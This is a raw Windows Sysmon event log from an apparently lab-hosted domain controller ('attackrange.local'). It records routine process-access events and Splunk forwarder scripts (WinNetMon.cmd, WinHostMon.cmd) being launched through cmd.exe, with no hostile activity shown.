13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.501{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.393{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 